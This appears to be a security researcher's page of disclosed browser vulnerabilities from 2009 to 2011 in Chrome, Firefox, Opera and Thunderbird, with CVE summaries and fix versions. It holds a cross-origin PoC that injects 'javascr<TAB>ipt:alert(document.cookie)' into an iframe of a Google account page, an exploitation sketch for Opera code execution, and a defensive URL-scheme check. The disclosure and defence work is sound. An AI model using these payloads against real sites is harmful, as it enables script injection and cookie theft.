[CVE-2011-3875] URL bar spoof with drag+drop of URLs


Title: Google Chrome Location Bar Spoofing using a very long string in a web address in the location bar / URL bar spoof with drag+drop of URLs


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3875


Author: Security researcher Jordi Chancel


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/10/chrome-stable-release.html


Description:

Google Chrome before 15.0.874.102 does not properly handle drag and drop operations on URL strings, which allows user-assisted remote attackers to spoof the URL bar via unspecified vectors.


  • Demonstration video:

Example video: Google Chrome URL Spoofing Vulnerability using Drag & Drop (the user tries to drag and drop selected text into the location bar in order to search Google for the selected words).


-Security Researcher Jordi Chancel

[CVE-2011-2848] URL bar spoof with forward button / Possible URL Bar Spoofing when history.forward() is ignored using forward button


Issue: URL bar spoof with forward button / Possible URL Bar Spoofing when history.forward() is ignored using forward button


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2848


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/09/stable-channel-update_16.html


Issue 89564 http://code.google.com/p/chromium/issues/detail?id=89564


Announced: September 16, 2011
Reporter: Security researcher Jordi Chancel
Impact: Moderate
Products: Google Chrome
Fixed in: Google Chrome 14.0.835.163


Description

Google Chrome before 14.0.835.163 allows user-assisted remote attackers to spoof the URL bar via vectors related to the forward button.

Report Description

In some cases, after several window.location='attacker' assignments have been used, history.forward() can be ignored.
If the user then goes forward manually in Google Chrome, opens a new tab and closes it, the location bar is spoofed.


  • Demonstration video:


-Security Researcher Jordi Chancel

[CVE 2011-2377] Memory corruption due to multipart/x-mixed-replace images

CVE-2011-2377 / MFSA 2011-21


Memory corruption due to multipart/x-mixed-replace images


Announced: June 21, 2011
Reporter: Jordi Chancel
Impact: Critical
Products: Firefox, SeaMonkey, Thunderbird
Fixed in: Firefox 3.6.18 – Firefox 5 – SeaMonkey 2.2 – Thunderbird 3.1.11


Description

Security researcher Jordi Chancel reported a crash on multipart/x-mixed-replace images due to memory corruption.


CVE Description

Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a multipart/x-mixed-replace image.


  • Demonstration video:


Security Researcher Jordi Chancel

[CVE-2011-1452] URL bar spoof with redirect and manual reload / URL Bar Spoofing using redirection and location.reload()


Issue: URL bar spoof with redirect and manual reload / URL Bar Spoofing using redirect and location.reload()


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1452


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/04/chrome-stable-update.html


Issue 77786 https://code.google.com/p/chromium/issues/detail?id=77786


Announced: April 27, 2011
Reporter: Security researcher Jordi Chancel
Impact: Moderate
Products: Google Chrome
Fixed in: Google Chrome 11.0.696.57


Description

Google Chrome before 11.0.696.57 allows user-assisted remote attackers to spoof the URL bar via vectors involving a redirect and a manual reload.

Report Description

Click on the button. When you see twitter.com in the tab title, open a new tab, then look back at the previous tab: the URL bar shows twitter.com while the previous content is still displayed.


  • Demonstration video:


  • Demonstration image of the same vulnerability, which also allows spoofing of the secure-connection indicator (SSL/TLS spoofing):


-Security Researcher Jordi Chancel

[CVE 2011-0061] Buffer Overflow/Crash caused by corrupted JPEG image

CVE-2011-0061 / MFSA 2011-09


Crash caused by corrupted JPEG image


Announced: March 1, 2011
Reporter: Jordi Chancel
Impact: Critical
Products: Firefox, Thunderbird
Fixed in: Firefox 3.6.14 – Thunderbird 3.1.8


Description

Security researcher Jordi Chancel reported that a JPEG image could be constructed that would be decoded incorrectly, causing data to be written past the end of a buffer created to store the image. An attacker could potentially craft such an image that would cause malicious code to be stored in memory and then later executed on a victim's computer.


Firefox 3.5 was not affected by this issue.


  • Demonstration video:


Security Researcher Jordi Chancel

[CVE-2011-1107] Google Chrome Location Bar URL/SSL Spoofing And Login/Password stealing


Title: Google Chrome URL Bar Spoofing (can be used to steal logins and passwords saved in Google Chrome)


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1107


Author: Security researcher Jordi Chancel


UPDATE Link: http://googlechromereleases.blogspot.fr/2011/02/stable-channel-update_28.html


Description:

Unspecified vulnerability in Google Chrome before 9.0.597.107 allows remote attackers to spoof the URL bar via unknown vectors.


  • Some demonstration videos:

Location Bar Spoofing Vulnerability with Login and Password Stealing.


Location Bar Spoofing Vulnerability and possible JavaScript code execution on the targeted website, using the drag-and-drop event of a JavaScript link into the Location Bar.


  • Demonstration image of another result obtained with the same vulnerability:


-Security Researcher Jordi Chancel

[CVE-2011-0682] Large form inputs can allow execution of arbitrary code


Title: OPERA – Large form inputs can allow execution of arbitrary code


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0682


Author: Security researcher Jordi Chancel


UPDATE Link: http://www.opera.com/fr/security/advisory/982


Description:

When certain large form inputs appear on a web page, they can cause Opera to crash. In some cases, the crash can lead to memory corruption, which could be used to execute code. To inject code, additional techniques will have to be employed.


Opera’s response:

Opera Software has released Opera 11.01, where this issue has been fixed.


  • Demonstration video:


-Security Researcher Jordi Chancel

[CVE 2010-4045] Opera 10.62 Reloads and redirects can allow spoofing, universal cross site scripting and Command/code Execution


Hello everyone,
Now that our remote code execution vulnerability in Opera 10.62 has been fixed for several versions, we can finally reveal some technical details about it.
The bug in question uses the cross-domain scripting / cross-site scripting vulnerability in Opera 10.62 discovered by Jordi Chancel in order to inject code into Opera's configuration (opera:config).
Injecting code into Opera's configuration is, however, more complicated and gives a more random result than injecting code into a third-party domain.
For universal exploitation (which remains possible with this kind of exploit) one would nevertheless need to measure visitors' browsing speed in order to best determine the time needed to stop the page load and then inject the malicious code.
DEP and ASLR restrictions do not apply to command execution vulnerabilities, which leaves this kind of exploit relatively dangerous and, in some cases, more reliable than a memory corruption vulnerability, whose results are often more random.
Implementing this vulnerability is nevertheless relatively simple: it is enough to define a document.write() on the web page's onload event and inject there the code needed to reload that same page (reload()) so that it leads to a redirect (a server-side language must be used to replace the page content with a redirect on reload).
Finally, the loading must be stopped after a certain delay
setTimeout("stop()", XXXX);
and the code leading to arbitrary code execution injected.


Advisory: Reloads and redirects can allow spoofing and cross site scripting


October 6, 2010


Severity: Critical


Description
Scripts on a page are supposed to be restricted so that they can only interact with other pages from the same domain and security context. Carefully timed reloads and redirects, when combined with appropriate caching, can cause scripts to execute in the wrong security context in Opera. This allows cross site scripting (XSS). In some cases, the address bar will also show the address of the target page.


With minimal user interaction, this particular XSS vector may also be used to modify Opera’s configuration, and this may in turn be used to execute arbitrary code on the computer.


Opera’s response
Opera Software has released Opera 10.63, where this issue has been fixed.


[VIDEO1] Code execution via opera:config:

[VIDEO2] Address bar spoofing and cross-domain scripting / XSS

[VIDEO3] Code execution via opera:config on Mac

Vulnerability reported on 14/09/2010 on Bugs.opera.com

PoC: http://www.alternativ-testing.fr/Research/Opera/Opera Location Bar Spoofing & Cross Domain Vulnerability 10.62/tddsdss6565682147testcase/


-Security Researcher Jordi Chancel

[CVE 2010-2751] SSL spoofing with history.back() and history.forward()


Advisory: Multiple location bar spoofing vulnerabilities

CVE 2010-2751: SSL spoofing with history.back() and history.forward()


Announced: July 20, 2010
Reporter: Jordi Chancel
Impact: Moderate
Products: Firefox, SeaMonkey
Fixed in: Firefox 3.5.11 – Firefox 3.6.7 – SeaMonkey 2.0.6


Description

Security researcher Jordi Chancel reported that the location bar could be spoofed to look like a secure page when the current document was served via plaintext. The vulnerability is triggered by a server by first redirecting a request for a plaintext resource to another resource behind a valid SSL/TLS certificate. A second request made to the original plaintext resource which is responded to not with a redirect but with JavaScript containing history.back() and history.forward() will result in the plaintext resource being displayed with valid SSL/TLS badging in the location bar.


  • Demonstration video:


Security Researcher Jordi Chancel

[CVE-2010-1663] Google Chrome Cross Origin Bypass in Google URL (GURL)


Title: Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)


CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663


Author: Security researcher Jordi Chancel


UPDATE Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html


Description:

The Google URL Parsing Library (aka google-url or GURL) in Google Chrome before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy via a CHARACTER TABULATION or other escape characters inside a javascript: protocol string.


All PoCs:
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>


<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>
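Every PoC variant above relies on the same property: a tab, line feed or carriage return placed inside the scheme is discarded by the browser's URL parser before the scheme is compared, so a check that inspects the raw string sees `javascr<TAB>ipt:` while the browser ends up navigating to `javascript:`. The following is an added example, not code from the advisory or from Chromium, showing a naive string check beside a canonicalizing check that mirrors the WHATWG URL Standard's preprocessing (trim leading and trailing C0 controls and spaces, then remove ASCII tab, LF and CR anywhere) before reading the scheme. The function names and the `DANGEROUS_SCHEMES` set are this example's own choices.

```javascript
// Added example (not from the advisory or from Chromium): a naive scheme
// check versus a canonicalizing one, run over the PoC spellings above.
// The canonicalization follows the WHATWG URL Standard's preprocessing of
// the input before scheme parsing; the scheme set below is an assumption.

const DANGEROUS_SCHEMES = new Set(['javascript', 'data', 'vbscript']);

// Naive check: looks at the raw string. Any tab/newline inside the scheme
// defeats it, which is exactly what the PoC variants rely on.
function naiveIsScriptUrl(input) {
  return input.toLowerCase().startsWith('javascript:');
}

// Canonicalize the way a browser's URL parser does before it reads the
// scheme, then return the lowercase scheme, or null if there is none.
function canonicalScheme(input) {
  // 1. trim leading/trailing C0 control characters (U+0000..U+001F) and space
  let s = input.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  // 2. remove ASCII tab, LF and CR anywhere in the string
  s = s.replace(/[\t\n\r]/g, '');
  // 3. scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ':'
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Hardened check: compare the canonical scheme, not the raw text.
function isScriptUrl(input) {
  const scheme = canonicalScheme(input);
  return scheme !== null && DANGEROUS_SCHEMES.has(scheme);
}

// The five PoC spellings from the advisory plus a plain one, constructed
// inline so the file runs offline.
const POC_URLS = [
  'javascr\u0009ipt:alert(document.cookie)',
  'javascr\x09ipt:alert(document.cookie)',
  'javascr\nipt:alert(document.cookie)',
  'javascr\ript:alert(document.cookie)',
  'javascr\tipt:alert(document.cookie)',
  'javascript:alert(document.cookie)',
];

// For each input, report what each check decides.
function compareChecks(urls) {
  return urls.map((u) => ({
    url: JSON.stringify(u),
    naive: naiveIsScriptUrl(u),
    canonical: isScriptUrl(u),
  }));
}

// Ordinary URLs must keep their scheme after canonicalization.
function safeExamples() {
  return [
    'https://www.google.com/accounts/ManageAccount?hl=fr',
    'mailto:someone@example.test',
  ].map(canonicalScheme);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(compareChecks(POC_URLS));
}
```

Run with `node` to see the table: the naive check reports `false` for all five PoC spellings and `true` only for the plain one, while the canonical check reports `true` for all six. The Chrome fix was on the parser side, so a check like this in application code is defense in depth for anything that validates user-supplied URLs (link hrefs, redirect targets); independently, a page that sends `X-Frame-Options: DENY` cannot be loaded into the named `<iframe>` that the PoC targets.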


  • Demonstration video:


-Security Researcher Jordi Chancel

[CVE 2009-3985] URL spoofing via invalid document.location


Advisory: Location bar spoofing vulnerabilities

CVE 2009-3985: URL spoofing via invalid document.location


Announced: December 15, 2009
Reporter: Jordi Chancel
Impact: Moderate
Products: Firefox, SeaMonkey
Fixed in: Firefox 3.0.16 – Firefox 3.5.6 – SeaMonkey 2.0.1


Description

Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44 in which a web page can set document.location to a URL that can't be displayed properly and then inject content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking but invalid URL in the location bar and inject HTML and JavaScript into the body of the page, resulting in a spoofing attack.


  • Demonstration video:


Security Researcher Jordi Chancel